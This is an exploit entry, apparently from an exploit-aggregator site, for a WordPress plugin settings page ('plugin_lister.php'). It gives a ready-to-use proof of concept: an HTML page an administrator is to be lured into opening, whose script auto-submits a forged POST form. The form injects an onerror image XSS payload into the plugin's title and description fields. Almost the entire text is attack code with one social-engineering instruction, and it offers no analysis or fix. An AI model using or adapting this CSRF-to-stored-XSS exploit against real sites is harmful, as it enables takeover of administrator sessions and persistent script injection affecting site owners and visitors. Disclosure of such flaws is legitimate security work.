Share
## https://sploitus.com/exploit?id=WPEX-ID:0D95DE23-E8F6-4342-B19C-57CD22B2FEE2
Make an admin open an HTML page containing the following code:

<form action="https://example.com/wp-admin/options-general.php?page=plugin_lister.php&time=1670618030" method="POST">
    <input type="text" name="title" value='"><img src=x onerror=alert(1)>'>
    <input type="text" name="description" value='"><img src=x onerror=alert(1)>'>
</form>
<script>
    document.forms[0].submit();
</script>